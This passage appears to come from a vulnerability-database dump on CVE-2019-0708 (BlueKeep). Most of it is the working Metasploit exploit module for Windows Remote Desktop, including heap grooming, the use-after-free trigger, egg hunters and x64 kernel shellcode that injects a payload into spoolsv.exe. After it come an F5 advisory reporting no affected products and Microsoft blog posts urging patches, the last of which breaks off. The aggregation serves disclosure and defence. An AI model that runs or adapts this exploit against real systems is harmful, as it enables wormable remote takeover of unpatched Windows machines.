mouse move events keeps the connection alive\n # (this handles a groom duration > 30 seconds, such as over Internet/VPN)\n rdp_move_mouse\n\n # simulate slow connection if GROOMDELAY is set\n if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0\n sleep(datastore['GROOMDELAY'])\n end\n\n groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n groom_elapsed_time = groom_current_time - groom_start_time\n groom_elapsed_str = \"%02d:%02d:%02d\" % [groom_elapsed_time / 3600,\n groom_elapsed_time / 60%60,\n groom_elapsed_time % 60]\n\n groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1\n vprint_status(\"Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})\")\n end\n end\n\n # Terminating and disconnecting forces the USE\n print_status(\"Forcing the USE of FREE'd object ...\")\n\n # target is groomed, the early cancellation dangers are complete\n print_warning(\"<---------------- | Leaving Danger Zone | ---------------->\")\n rdp_terminate\n rdp_disconnect\n end\n\n # Helper function to create the kernel mode payload and the usermode payload with\n # the egg hunter prefix.\n def create_payloads(pool_address)\n begin\n [kernel_mode_payload, user_mode_payload].map { |p|\n [\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\n p\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\n }\n rescue => ex\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\n end\n end\n\n def assemble_with_fixups(asm)\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\n # not grok that syntax.\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\n asm.gsub!(lea_rel) do |match|\n match = \"lea #{$1}, [rip + #{$2}]\"\n end\n\n # metasm encodes all rep instructions as repnz\n # https://github.com/jjyg/metasm/pull/40\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 
0xa4')\n\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\n\n # Fixup above rewritten instructions with the relative label offsets\n encoded.reloc.each do |offset, reloc|\n target = reloc.target.to_s\n if encoded.export.key?(target)\n # Note: this assumes the address we're fixing up is at the end of the\n # instruction. This holds for 'lea' but if there are other fixups\n # later, this might need to change to account for specific instruction\n # encodings\n if reloc.type == :i32\n instr_offset = offset + 4\n elsif reloc.type == :i16\n instr_offset = offset + 2\n end\n encoded.fixup(target => encoded.export[target] - instr_offset)\n else\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\n end\n end\n encoded.fill\n encoded.data\n end\n\n # The user mode payload has two parts. The first is an egg hunter that searches for\n # the kernel mode payload. The second part is the actual payload that's invoked in\n # user land (i.e. it's injected into spoolsv.exe). We need to spray both the kernel\n # and user mode payloads around the heap in different packets because we don't have\n # enough space to put them both in the same chunk. 
Given that code exec can result in\n # landing on the user land payload, the egg is used to go to a kernel payload.\n def user_mode_payload\n\n asm = %Q^\n_start:\n lea rcx, [rel _start]\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\n_egg_loop:\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\n mov rdx, [rcx - 8]\n cmp rdx, r8\n jnz _egg_loop\n jmp rcx\n ^\n egg_loop = assemble_with_fixups(asm)\n\n # The USERMODE_EGG is required at the start as well, because the exploit code\n # assumes the tag is there, and jumps over it to find the shellcode.\n [\n USERMODE_EGG,\n egg_loop,\n USERMODE_EGG,\n payload.raw\n ].pack('<Qa*<Qa*')\n end\n\n def kernel_mode_payload\n\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\n #\n # This shellcode was written originally for eternalblue exploits\n # eternalblue_exploit7.py and eternalblue_exploit8.py\n #\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\n #\n # Note:\n # - The userland shellcode is run in a new thread of system process.\n # If userland shellcode causes any exception, the system process get killed.\n # - On idle target with multiple core processors, the hijacked system call\n # might take a while (> 5 minutes) to get called because the system\n # call may be called on other processors.\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\n # This is ok because some Windows functions do not require a shadow stack.\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\n # Note: the Windows 8 version macros are removed below\n # - The userland payload MUST be appened to this shellcode.\n #\n # References:\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\n\n data_kapc_offset = 0x30\n\n data_hal_original_syscall_shadow_common_offset_offset = 0x20\n 
data_hal_fake_syscall_spinlock_offset = 0x10\n\n data_nt_kernel_addr_offset = 0x8\n data_origin_syscall_offset = 0\n data_peb_addr_offset = -0x10\n data_queueing_kapc_offset = -0x8\n hal_heap_storage = 0xffffffffffd04100\n\n # These hashes are not the same as the ones used by the\n # Block API so they have to be hard-coded.\n createthread_hash = 0x835e515e\n keinitializeapc_hash = 0x6d195cc4\n keinsertqueueapc_hash = 0xafcc4634\n psgetcurrentprocess_hash = 0xdbf47c78\n psgetprocessid_hash = 0x170114e1\n psgetprocessimagefilename_hash = 0x77645f3f\n psgetprocesspeb_hash = 0xb818b848\n psgetthreadteb_hash = 0xcef84c3e\n spoolsv_exe_hash = 0x3ee083d8\n zwallocatevirtualmemory_hash = 0x576e99ea\n\n asm = %Q^\nshellcode_start:\n ; egg tag\n nop\n nop\n nop\n nop\n\nsetup_syscall_shadow_hook:\n ; IRQL is PASSIVE_LEVEL when got code execution\n ;int 0x3\n\n mov rbp, #{hal_heap_storage}\n\n ; allow interrupts while executing shellcode\n sti\n call r3_to_r0_start\n cli\n\n ;--------------------- HACK crappy thread cleanup --------------------\n ; This code is effectively the same as the epilogue of the function that calls\n ; the vulnerable function in the kernel, with a tweak or two.\n ; TODO: make the lock not suck!!\n mov rax, qword [gs:0x188]\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\n lea r11, [rsp+0b8h]\n xor eax, eax\n mov rbx, [r11+30h]\n mov rbp, [r11+40h]\n mov rsi, [r11+48h]\n mov rsp, r11\n pop r15\n pop r14\n pop r13\n pop r12\n pop rdi\n ret\n\nr3_to_r0_start:\n ; save used non-volatile registers\n push r15\n push r14\n push rdi\n push rsi\n push rbx\n push rax ; align stack by 0x10\n\n ;======================================\n ; find nt kernel address\n ;======================================\n mov r15, qword [gs:0x38] ; get IdtBase of KPCR\n mov r15, qword [r15 + 0x4] ; get ISR address\n shr r15, 0xc ; strip to page size\n shl r15, 0xc\n\n_x64_find_nt_walk_page:\n sub r15, 0x1000 ; walk along page size\n cmp word [r15], 0x5a4d ; 
'MZ' header\n jne _x64_find_nt_walk_page\n\n ; save nt address for using in KernelApcRoutine\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\n\n ;======================================\n ; get current EPROCESS and ETHREAD\n ;======================================\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\n mov edi, #{psgetcurrentprocess_hash}\n call win_api_direct\n xchg rcx, rax ; rcx = EPROCESS\n\n ; r15 : nt kernel address\n ; r14 : ETHREAD\n ; rcx : EPROCESS\n\n ;======================================\n ; find offset of EPROCESS.ImageFilename\n ;======================================\n mov edi, #{psgetprocessimagefilename_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\n\n\n ;======================================\n ; find offset of EPROCESS.ThreadListHead\n ;======================================\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\n\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\n jb _find_eprocess_threadlist_offset_win7\n add eax, 0x10\n_find_eprocess_threadlist_offset_win7:\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\n\n ;======================================\n ; find offset of ETHREAD.ThreadListEntry\n ;======================================\n\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\n mov r9, r8\n\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\n_find_ethread_threadlist_offset_loop:\n mov r9, qword [r9]\n\n cmp r8, r9 ; check end of list\n je _insert_queue_apc_done ; not found !!!\n\n ; if (r9 - r14 < 0x700) found\n mov rax, r9\n sub rax, r14\n cmp rax, 0x700\n ja _find_ethread_threadlist_offset_loop\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\n\n\n ;======================================\n ; find offset of 
EPROCESS.ActiveProcessLinks\n ;======================================\n mov edi, #{psgetprocessid_hash}\n call get_proc_addr\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\n\n\n ;======================================\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\n ;======================================\n ; check process name\n\n\n xor eax, eax ; HACK to exit earlier if process not found\n\n_find_target_process_loop:\n lea rsi, [rcx+rbx]\n\n push rax\n call calc_hash\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\n pop rax\n jz found_target_process\n\n;---------- HACK PROCESS NOT FOUND start -----------\n inc rax\n cmp rax, 0x300 ; HACK not found!\n jne _next_find_target_process\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n\n jmp _r3_to_r0_done\n\n;---------- HACK PROCESS NOT FOUND end -----------\n\n_next_find_target_process:\n ; next process\n mov rcx, [rcx+rdi]\n sub rcx, rdi\n jmp _find_target_process_loop\n\n\nfound_target_process:\n ; The allocation for userland payload will be in KernelApcRoutine.\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\n\n ;======================================\n ; save process PEB for finding CreateThread address in kernel KAPC routine\n ;======================================\n mov edi, #{psgetprocesspeb_hash}\n ; rcx is EPROCESS. 
no need to set it.\n call win_api_direct\n mov [rbp+#{data_peb_addr_offset}], rax\n\n\n ;======================================\n ; iterate ThreadList until KeInsertQueueApc() success\n ;======================================\n ; r15 = nt\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\n ; rcx = EPROCESS\n ; edx = offset of EPROCESS.ThreadListHead\n\n\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n mov rbx, rsi ; use rbx for iterating thread\n\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\n ; try queueing APC then check KAPC member is more reliable.\n\n_insert_queue_apc_loop:\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\n mov rbx, [rbx+8]\n\n cmp rsi, rbx\n je _insert_queue_apc_loop ; skip list head\n\n ; find start of ETHREAD address\n ; set it to rdx to be used for KeInitializeApc() argument too\n lea rdx, [rbx + r14] ; ETHREAD\n\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\n ; Teb member is next to Queue member.\n mov edi, #{psgetthreadteb_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\n je _insert_queue_apc_loop\n\n ; KeInitializeApc(PKAPC,\n ; PKTHREAD,\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\n ; PKRUNDOWN_ROUTINE = NULL,\n ; PKNORMAL_ROUTINE = userland_shellcode,\n ; KPROCESSOR_MODE = UserMode (1),\n ; PVOID 
Context);\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\n xor r8, r8 ; OriginalApcEnvironment\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\n push rbp ; context\n push 1 ; UserMode\n push rbp ; userland shellcode (MUST NOT be NULL)\n push r8 ; NULL\n sub rsp, 0x20 ; shadow stack\n mov edi, #{keinitializeapc_hash}\n call win_api_direct\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\n\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\n ; SystemArgument1 is second argument in usermode code (rdx)\n ; SystemArgument2 is third argument in usermode code (r8)\n lea rcx, [rbp+#{data_kapc_offset}]\n ;xor edx, edx ; no need to set it here\n ;xor r8, r8 ; no need to set it here\n xor r9, r9\n mov edi, #{keinsertqueueapc_hash}\n call win_api_direct\n add rsp, 0x40\n ; if insertion failed, try next thread\n test eax, eax\n jz _insert_queue_apc_loop\n\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\n ; EPROCESS pointer 8 bytes\n ; InProgressFlags 1 byte\n ; KernelApcPending 1 byte\n ; if success, UserApcPending MUST be 1\n cmp byte [rax+0x1a], 1\n je _insert_queue_apc_done\n\n ; manual remove list without lock\n mov [rax], rax\n mov [rax+8], rax\n jmp _insert_queue_apc_loop\n\n_insert_queue_apc_done:\n ; The PEB address is needed in kernel_apc_routine. 
Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\n\n_r3_to_r0_done:\n pop rax\n pop rbx\n pop rsi\n pop rdi\n pop r14\n pop r15\n ret\n\n;========================================================================\n; Call function in specific module\n;\n; All function arguments are passed as calling normal function with extra register arguments\n; Extra Arguments: r15 = module pointer\n; edi = hash of target function name\n;========================================================================\nwin_api_direct:\n call get_proc_addr\n jmp rax\n\n\n;========================================================================\n; Get function address in specific module\n;\n; Arguments: r15 = module pointer\n; edi = hash of target function name\n; Return: eax = offset\n;========================================================================\nget_proc_addr:\n ; Save registers\n push rbx\n push rcx\n push rsi ; for using calc_hash\n\n ; use rax to find EAT\n mov eax, dword [r15+60] ; Get PE header e_lfanew\n mov eax, dword [r15+rax+136] ; Get export tables RVA\n\n add rax, r15\n push rax ; save EAT\n\n mov ecx, dword [rax+24] ; NumberOfFunctions\n mov ebx, dword [rax+32] ; FunctionNames\n add rbx, r15\n\n_get_proc_addr_get_next_func:\n ; When we reach the start of the EAT (we search backwards), we hang or crash\n dec ecx ; decrement NumberOfFunctions\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\n add rsi, r15 ; Add the modules base address\n\n call calc_hash\n\n cmp eax, edi ; Compare the hashes\n jnz _get_proc_addr_get_next_func ; try the next function\n\n_get_proc_addr_finish:\n pop rax ; restore EAT\n mov ebx, dword [rax+36]\n add rbx, r15 ; ordinate table virtual address\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\n mov ebx, dword [rax+28] ; Get the function addresses table rva\n add rbx, r15 ; Add the modules base address\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\n add rax, r15 ; Add the modules base address to get 
the functions actual VA\n\n pop rsi\n pop rcx\n pop rbx\n ret\n\n;========================================================================\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\n;\n; Argument: rsi = string to hash\n; Clobber: rsi\n; Return: eax = hash\n;========================================================================\ncalc_hash:\n push rdx\n xor eax, eax\n cdq\n_calc_hash_loop:\n lodsb ; Read in the next byte of the ASCII string\n ror edx, 13 ; Rotate right our hash value\n add edx, eax ; Add the next byte of the string\n test eax, eax ; Stop when found NULL\n jne _calc_hash_loop\n xchg edx, eax\n pop rdx\n ret\n\n\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\n; Moreover, there is no lock when calling KernelApcRoutine.\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\n;\n; VOID KernelApcRoutine(\n; IN PKAPC Apc,\n; IN PKNORMAL_ROUTINE *NormalRoutine,\n; IN PVOID *NormalContext,\n; IN PVOID *SystemArgument1,\n; IN PVOID *SystemArgument2)\nkernel_kapc_routine:\n push rbp\n push rbx\n push rdi\n push rsi\n push r15\n\n mov rbp, [r8] ; *NormalContext is our data area pointer\n\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\n push rdx\n pop rsi ; mov rsi, rdx\n mov rbx, r9\n\n ;======================================\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\n ;======================================\n xor eax, eax\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\n ; rdx is already address of baseAddr\n mov [rdx], rax ; baseAddr = 0\n mov ecx, eax\n not rcx ; ProcessHandle = -1\n mov r8, rax ; ZeroBits\n mov al, 0x40 ; eax = 0x40\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\n push rax ; MEM_COMMIT = 0x1000\n ; reuse r9 for address of RegionSize\n mov [r9], rax ; RegionSize = 0x1000\n 
sub rsp, 0x20 ; shadow stack\n mov edi, #{zwallocatevirtualmemory_hash}\n call win_api_direct\n add rsp, 0x30\n\n ; check error\n test eax, eax\n jnz _kernel_kapc_routine_exit\n\n ;======================================\n ; copy userland payload\n ;======================================\n mov rdi, [rsi]\n\n;--------------------------- HACK IN EGG USER ---------\n\n push rdi\n\n lea rsi, [rel shellcode_start]\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\n\n _find_user_egg_loop:\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _find_user_egg_loop\n\n _inner_find_user_egg_loop:\n inc rsi\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _inner_find_user_egg_loop\n\n pop rdi\n;--------------------------- END HACK EGG USER ------------\n\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\n\n rep movsb\n\n ;======================================\n ; find CreateThread address (in kernel32.dll)\n ;======================================\n mov rax, [rbp+#{data_peb_addr_offset}]\n mov rax, [rax + 0x18] ; PEB->Ldr\n mov rax, [rax + 0x20] ; InMemoryOrder list\n\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n ;mov rbx, rsi ; use rbx for iterating thread\n_find_kernel32_dll_loop:\n mov rax, [rax] ; first one always be executable\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\n ; offset 0x50 => is name\n ; offset 0x20 => is dllbase\n ;cmp word [rax+0x38], 0x40\n ;jne _find_kernel32_dll_loop\n cmp word [rax+0x48], 0x18\n jne _find_kernel32_dll_loop\n\n mov rdx, [rax+0x50]\n ; check only \"32\" because name might be lowercase or uppercase\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\n jnz _find_kernel32_dll_loop\n\n mov r15, [rax+0x20]\n mov edi, #{createthread_hash}\n call get_proc_addr\n\n ; save CreateThread address to SystemArgument1\n mov [rbx], rax\n\n_kernel_kapc_routine_exit:\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked 
system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n ; restore IRQL to APC_LEVEL\n mov cl, 1\n mov cr8, rcx\n\n pop r15\n pop rsi\n pop rdi\n pop rbx\n pop rbp\n ret\n\nuserland_start_thread:\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\n xor ecx, ecx ; lpThreadAttributes = NULL\n push rcx ; lpThreadId = NULL\n push rcx ; dwCreationFlags = 0\n mov r9, rcx ; lpParameter = NULL\n lea r8, [rel userland_payload] ; lpStartAddr\n mov edx, ecx ; dwStackSize = 0\n sub rsp, 0x20\n call rax\n add rsp, 0x30\n ret\n\nuserland_payload:\n ^\n\n [\n KERNELMODE_EGG,\n assemble_with_fixups(asm)\n ].pack('<Qa*')\n end\n\n def create_free_trigger(chan_user_id, chan_id)\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\n # The extra bytes on the end of the body is what causes the bad things to happen\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\n end\n\n def create_exploit_channel_buffer(target_addr)\n overspray_addr = target_addr + 0x2000\n shellcode_vtbl = target_addr + HEADER_SIZE\n magic_value1 = overspray_addr + 0x810\n magic_value2 = overspray_addr + 0x48\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\n\n # first 0x38 bytes are used by DATA PDU packet\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\n [\n [\n # SystemResourceList (2 pointers, each 8 bytes)\n # Pointer to OWNER_ENTRY (8 bytes)\n # ActiveCount (SHORT, 2 bytes)\n # Flag (WORD, 2 bytes)\n # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # 
TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\n magic_value2, # --------------------\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\n 0x0, # ActiveCount (SHORT, 2 bytes)\n 0x0, # Flag (WORD, 2 bytes)\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n 0x1F, # ClassOffset (DWORD, 4 bytes)\n 0x0, # bindStatus (DWORD, 4 bytes)\n 0x72, # lockCount1 (QWORD, 8 bytes)\n magic_value3, # connection (QWORD, 8 bytes)\n shellcode_vtbl, # shellcode vtbl ? 
(QWORD, 8 bytes)\n 0x5, # channelClass (DWORD, 4 bytes)\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\n 0x1F, # channelIndex (DWORD, 4 bytes)\n magic_value1, # channels (QWORD, 8 bytes)\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\n magic_value1, # connResrouce (QWORD, 8 bytes)\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\n 0x7065656b, # dword15C (DWORD, 4 bytes)\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\n ].join('')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb"}], "f5": [{"lastseen": "2020-04-06T22:40:29", "bulletinFamily": "software", "cvelist": ["CVE-2019-0708"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-06-03T22:04:00", "published": "2019-05-16T06:43:00", "id": "F5:K25238311", "href": "https://support.f5.com/csp/article/K25238311", "title": "Microsoft Remote Desktop Services 
Remote Code Execution vulnerability CVE-2019-0708", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2019-05-29T14:32:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "Today Microsoft released fixes for a critical Remote Code Execution vulnerability, [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>), in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is \u2018wormable\u2019, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the _WannaCry_ malware spread across the globe in 2017. While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware. \n\nNow that I have your attention, it is important that affected systems are patched as quickly as possible to prevent such a scenario from happening. In response, we are taking the unusual step of providing a security update for all customers to protect Windows platforms, including some out-of-support versions of Windows. \n\nVulnerable in-support systems include Windows 7, Windows Server 2008 R2, and Windows Server 2008. Downloads for in-support versions of Windows can be found in the [Microsoft Security Update Guide](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>). Customers who use an in-support version of Windows and have automatic updates enabled are automatically protected. \n\nOut-of-support systems include Windows 2003 and Windows XP. 
If you are on an out-of-support version, the best way to address this vulnerability is to upgrade to the latest version of Windows. Even so, we are making fixes available for these out-of-support versions of Windows in [KB4500705](<https://support.microsoft.com/help/4500705>). \n\nCustomers running Windows 8 and Windows 10 are not affected by this vulnerability, and it is no coincidence that later versions of Windows are unaffected. Microsoft invests heavily in strengthening the security of its products, often through major architectural improvements that are not possible to backport to earlier versions of Windows. \n\nThere is partial mitigation on affected systems that have [Network Level Authentication (NLA)](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713\\(v=ws.11\\)>) enabled. The affected systems are mitigated against \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. \n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NLA is enabled or not \u2013 should be updated as soon as possible. 
\n\n**Resources** \n[Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)\n[Links to downloads for Windows 2003 and Windows XP](<https://support.microsoft.com/help/4500705>)\n\n_Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC)_", "modified": "2019-05-14T17:05:03", "published": "2019-05-14T17:05:03", "id": "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "href": "https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/", "type": "msrc", "title": "Prevent a worm by updating Remote Desktop Services (CVE-2019-0708)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-09T03:34:06", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "On May 14, Microsoft released fixes for a critical Remote Code Execution vulnerability, [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>), in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 that affects some older versions of Windows. In our [previous blog post](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) on this topic we warned that the vulnerability is \u2018wormable\u2019, and that future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.\n\nMicrosoft is confident that an exploit exists for this vulnerability, and if [recent reports](<https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html>) are accurate, _nearly one million computers connected directly to the internet are **still** vulnerable to CVE-2019-0708_. Many more within corporate networks may also be vulnerable. 
